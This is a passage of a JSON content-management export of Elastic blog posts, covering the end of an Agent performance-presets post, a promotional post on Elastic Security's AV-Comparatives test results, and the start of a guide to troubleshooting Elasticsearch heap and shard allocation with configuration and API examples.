performance, high throughput, scalability, or low latency, these presets offer optimized configurations to meet your needs. Happy tuning!\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e\u003cem\u003eWhat else is new in Elastic 8.12? Check out the \u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-12-0\"\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e8.12 announcement post\u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e\u003cem\u003e to learn more \u0026gt;\u0026gt;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7c1cee14f73e0466"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3089d79ae367e5c1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csebfe256ee4f60b74"}}}],"publish_date":"2024-01-29","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltbf6fd364f32f8563","ACL":{},"created_at":"2023-11-06T21:50:46.524Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fleet-elastic-agent","label_l10n":"Fleet/Elastic Agent","tags":[],"title":"Fleet/Elastic Agent","updated_at":"2023-11-06T21:50:46.524Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:48:26.489Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltb5a7ebf330c5002e","ACL":{},"created_at":"2020-06-17T03:36:14.548Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"beats","label_l10n":"Beats","tags":[],"title":"Beats","updated_at":"2020-06-17T03:36:14.548Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.244Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt8e1fb3c2503581ab","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-01-24T20:23:03.297Z","created_by":"bltb6c155cd84fc0c1a","file_size":"178901","filename":"138291_-_Blog_header_2_V2.jpg","parent_uid":null,"tags":[],"title":"138291_-_Blog_header_2_V2.jpg","updated_at":"2024-01-24T20:23:03.297Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-01-25T14:00:00.311Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8e1fb3c2503581ab/65b171a768334a8547c60095/138291_-_Blog_header_2_V2.jpg"},"title":"Using Elastic Agent Performance Presets in 8.12","title_l10n":"Using Elastic Agent Performance Presets in 8.12","updated_at":"2024-12-17T14:58:54.350Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/using-elastic-agent-performance-presets-in-8-12","publish_details":{"time":"2024-12-17T14:59:02.090Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt38e86b4423818f55","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security excels in the AV-Comparatives Business Security Test — praised for seamless integration and advanced capabilities. With 99.8% malware detection, it shows the power of AI-driven security analytics in defending against today’s threats.","author":["blt014666be75ac5a2b"],"category":["bltb79594af7c5b4199"],"created_at":"2024-12-17T14:06:41.987Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd5ef2ad221991439"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security has achieved remarkable results in the recent \u003c/span\u003e\u003ca href=\"https://www.av-comparatives.org/tests/business-security-test-2024-august-november/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAV-Comparatives Business Security Test\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This independent assessment underscores our commitment to providing world-class malware protection.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why the AV-Comparatives Business Security Test matters","_metadata":{"uid":"cs70494232ad034726"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.av-comparatives.org/consumer/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAV-Comparatives\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is a highly respected organization that conducts rigorous, independent testing specifically for business endpoint security solutions. Unlike consumer antivirus tests, these evaluations go beyond basic malware detection. They simulate real-world attack scenarios that businesses encounter, including malicious websites, infected devices, and network threats. This multipronged approach provides valuable insights into a product's ability to safeguard businesses from contemporary threats. Performing well in the AV-Comparatives Business Security Test signifies a solution's effectiveness in keeping organizations protected.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Highlights from Elastic Security’s performance","_metadata":{"uid":"cs2313989d556dd36d"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAV-Comparatives recognizes the strength of Elastic Security, emphasizing that\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElastic Security integrates seamlessly with contemporary cybersecurity frameworks, leveraging the speed and extensibility of the Search AI Platform, making it an essential tool for modern security teams.\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e” This acknowledgment highlights our commitment to providing a cutting-edge security solution designed for the current dynamic threat landscape. By harnessing the power of Search AI, our platform delivers rapid, scalable protection that adapts to evolving security needs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eNearly perfect in Malware Protection Test:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic Security’s advanced threat detection engine achieved an impressive 99.8% score in the Malware Protection Test, highlighting its exceptional effectiveness in identifying and mitigating malware threats. This near-perfect result underscores Elastic Security's commitment to staying ahead of the curve in the ever-evolving malware landscape.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTarget real threats with zero false alarms on common business software:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e One of the most frustrating aspects of security software is dealing with false positives. Fortunately, Elastic Security boasts a perfect record of zero false positives on common business software in the test. This translates to a streamlined workflow for your security teams, allowing them to focus on genuine threats instead of wasting time investigating false alarms.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs26df47cd9e0bffa2"}}},{"image":{"image":{"uid":"blt09a09783a88745f3","_version":1,"title":"poll.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-17T14:41:50.152Z","updated_at":"2024-12-17T14:41:50.152Z","content_type":"image/png","file_size":"76291","filename":"poll.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-17T14:42:46.503Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt09a09783a88745f3/67618daee72011f591030822/poll.png"},"_metadata":{"uid":"cse193434c9ffaa285"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cscca2dd8804de43b7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese results reflect our continuous efforts to enhance security measures and provide reliable protection for businesses of all sizes. Elastic Security stands out as a trusted solution for protecting your organization's data from attacks.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Performance is key to security","_metadata":{"uid":"cs569e93def61f9157"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn today’s cybersecurity landscape, robust malware protection is essential for ensuring a smooth operational baseline. A sluggish device or high resource consumption can be a red flag that often signals the presence of malicious processes. While key security features like advanced threat detection, ransomware defense, and behavior-based protection are vital, system performance plays an equally important role. At Elastic Security, we recognize that effective protection must come without sacrificing system performance. We’ve made it our mission to deliver powerful security capabilities with minimal impact on CPU and memory usage — setting a high standard for how Elastic Agent is developed and maintained.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Get started with Elastic Security","_metadata":{"uid":"csae07809979df13e7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eJoin the growing number of businesses that trust Elastic Security to protect their organization against attacks. Experience the peace of mind that comes with knowing your endpoints — and organization as a whole — are secure against the latest threats. Start your Elastic Security \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style='font-size: 12pt;'\u003efree trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and discover the difference that our protection can make. Visit \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security\"\u003e\u003cspan style='font-size: 12pt;'\u003eelastic.co/security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to learn more and get started.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor more detailed results and to see the full report, visit \u003c/span\u003e\u003ca href=\"https://www.av-comparatives.org/tests/business-security-test-2024-august-november/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAV-Comparatives Business Security Test 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs207cc984ad909e08"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1388ed704d10132c"}}}],"publish_date":"2024-12-17","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Security among top solutions in AV-Comparatives Business Test","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Delivering exceptional performance and protection in rigorous evaluations","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltac352930d0bd6c7f","ACL":{},"created_at":"2023-11-06T21:36:27.692Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"xdr","label_l10n":"XDR","tags":[],"title":"XDR","updated_at":"2023-11-06T21:36:27.692Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.167Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blte41b0699a34eac99","ACL":{},"created_at":"2023-11-06T20:38:53.624Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"edr","label_l10n":"EDR","tags":[],"title":"EDR","updated_at":"2023-11-06T20:38:53.624Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:26.559Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blte007e1c9cef6ad6b","ACL":{},"created_at":"2020-06-17T03:32:48.898Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"endpoint-security","label_l10n":"Endpoint security","tags":[],"title":"Endpoint security","updated_at":"2020-07-06T22:20:15.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:22.357Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt585cc7cd992d372e","_version":1,"title":"137714 - Blog header_Option 1 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-17T14:06:40.580Z","updated_at":"2024-12-17T14:06:40.580Z","content_type":"image/jpeg","file_size":"101161","filename":"137714_-_Blog_header_Option_1_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-17T14:42:46.521Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt585cc7cd992d372e/67618570333a8645edc2344d/137714_-_Blog_header_Option_1_(1).jpg"},"title":"Elastic Security is a top performer in the latest AV-Comparatives Business Test","title_l10n":"Elastic Security is a top performer in the latest AV-Comparatives Business Test","updated_at":"2024-12-17T14:41:51.440Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-security-av-comparatives-business-test","publish_details":{"time":"2024-12-17T14:42:45.900Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb1ec879086c2333a","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"This blog provides tips and resources for troubleshooting Elasticsearch memory allocation. See the top allocation management theory links our Support team sends to users and where they direct users to resolve their resource allocation issues.","author":["bltddff0459e563bc78"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-09-30T23:55:13.531Z","created_by":"blt3044324473ef223b70bc674c","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csddb37782b8c035d1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith Elastic Cloud delivering solutions like Observability, Security, and Search, we've broadened the users who use Elastic Cloud beyond full ops teams to include data engineers, security teams, and consultants. As an Elastic support representative, I’ve enjoyed engaging with a diverse range of users and use cases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith a wider audience, I’m seeing more questions about managing resource allocation, in particular troubleshooting allocation health and avoiding circuit breakers. I get it! When I started with Elasticsearch, I had the same questions. It was my first intro to managing Java heap and time series database shards and scaling my own infrastructure.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen I joined Elastic, I loved that on top of documentation, we had blogs and tutorials so I could onboard quickly. But then I struggled my first month to correlate my theoretical knowledge to the errors users would send through my ticket queue. Eventually I figured out, like other support reps, that a lot of the reported errors were just symptoms of allocation issues and the same seven-ish links would bring users up to speed to successfully manage their resource allocation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSpeaking as a support rep, I’m going to go over the top allocation management theory links we send users, the top symptoms we see, and where we direct users to update their configurations to resolve their resource allocation issues.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Theory","_metadata":{"uid":"cs96737da32e053960"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs a Java application, Elasticsearch requires some logical memory (heap) allocation from the system’s physical memory. This should be up to half of the physical RAM, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/guide/current/heap-sizing.html#compressed_oops\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecapping at 32GB\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Setting higher heap usage is usually \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-memory-pressure.html#ec-memory-pressure-causes\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ein response\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to expensive queries and larger data storage. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/circuit-breaker.html#parent-circuit-breaker\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eParent circuit breaker\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e defaults to 95%, but we recommend scaling resources once consistently \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/found-understanding-memory-pressure-indicator#conclusion\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehitting 85%\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eI highly recommend these overview articles for more info:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/a-heap-of-trouble\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eA heap of trouble\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/guide/current/heap-sizing.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHeap: Sizing and swapping\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Configuration","_metadata":{"uid":"cs0a3c0dfb50f3d590"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOut of the box, Elasticsearch’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/advanced-configuration.html#setting-jvm-heap-size\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edefault settings\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e automatically size your JVM heap based on node role and total memory. However, as needed, you can configure it directly in the following three ways:\u003c/span\u003e\u003cbr /\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1. Directly in your \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/advanced-configuration.html#setting-jvm-heap-size\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003econfig \u0026gt; jvm.options\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e file of your local Elasticsearch files:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7d32b0304fa4ceee"}}},{"code":{"code":"## JVM configuration\n\n################################################################\n## IMPORTANT: JVM heap size\n################################################################\n\n…\n\n# Xms represents the initial size of total heap space\n# Xmx represents the maximum size of total heap space\n\n-Xms4g\n-Xmx4g","_metadata":{"uid":"cs5e46cac24287aae6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs179308ec437fc051"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e2. As an Elasticsearch environment variable \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.12/docker.html#docker-cli-run-prod-mode\"\u003e\u003cspan style='font-size: 12pt;'\u003ein your docker-compose\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csaa56425613c18df4"}}},{"code":{"code":"version: '2.2'\nservices:\n es01:\n\timage: docker.elastic.co/elasticsearch/elasticsearch:7.12.0\n\tenvironment:\n \t- node.name=es01\n \t- cluster.name=es\n \t- bootstrap.memory_lock=true\n \t- \"ES_JAVA_OPTS=-Xms4g -Xmx4g\"\n \t- discovery.type=single-node\n\tulimits:\n \tmemlock:\n \tsoft: -1\n \thard: -1\n\tports:\n \t- 9200:9200","_metadata":{"uid":"cs5b51e140ab5a3dc3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs04d10efb1f56f8ef"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e3. Via our Elastic Cloud Hosted \u0026gt; Deployment \u0026gt; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-customize-deployment-components.html#ec-cluster-size\"\u003e\u003cspan style='font-size: 12pt;'\u003eEdit view\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eNote:\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e The drop down assigns physical memory and roughly half will be allotted to the heap.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs78e99b5fdadbfb62"}}},{"image":{"image":{"uid":"blt21fba1109675bda8","_version":1,"title":"blog-elasticsearch-hot-data-content-tier.png","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-11-04T16:39:06.647Z","updated_at":"2024-11-04T16:39:06.647Z","content_type":"image/png","file_size":"53163","filename":"blog-elasticsearch-hot-data-content-tier.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-05T15:06:14.566Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt21fba1109675bda8/6728f8aa9b78e715d553807f/blog-elasticsearch-hot-data-content-tier.png"},"_metadata":{"uid":"cs6e45ad401ec63e10"},"caption_l10n":"","alt_text_l10n":"elasticsearch hot data and content tier","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Troubleshooting","_metadata":{"uid":"cs6c6ce5ece703a5af"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf you’re currently experiencing performance issues with your cluster, it will most likely come down to the usual suspects:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eConfiguration issues:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Undersized master nodes, no \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/getting-started-index-lifecycle-management.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eILM\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e policy\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVolume induced:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e High request pace/load, overlapping expensive queries/writes\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAll following cURL/API requests can be made in the Elastic Cloud Hosted \u0026gt; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-api-console.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch API Console\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, as a cURL to the Elasticsearch API, or under Kibana \u0026gt; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/master/console-kibana.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDev Tools\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e"},{"title_l10n":"Allocation health","_metadata":{"uid":"csf5a226700d58d1c6"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData indices \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules.html\"\u003e\u003cspan style='font-size: 12pt;'\u003estore into sub-shards\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which use heap for maintenance and during search/write requests. Shard size should \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/7.16/size-your-shards.html#shard-size-recommendation\"\u003e\u003cspan style='font-size: 12pt;'\u003ebe no larger than 50GB\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;Taking the above Elastic Cloud Hosted example with 8GB of physical memory across two zones (which will allocate two nodes in total), let’s join this to an example:\u0026nbsp; \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-allocation.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cat/allocation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csea592384116ee716"}}},{"code":{"code":"GET /_cat/allocation?v=true\u0026h=shards,node\nshards node\n 41 instance-0000000001\n 41 instance-0000000000","_metadata":{"uid":"cs7a4fc3e94009b7e8"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs13128b83dbcedffd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAnd to: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-health.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_cluster/health\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs10c4578db37a0e7a"}}},{"code":{"code":"GET /_cluster/health?filter_path=status,*_shards\n\n{\n \"status\": \"green\",\n \"unassigned_shards\": 0,\n \"initializing_shards\": 0,\n \"active_primary_shards\": 41,\n \"relocating_shards\": 0,\n \"active_shards\": 82,\n \"delayed_unassigned_shards\": 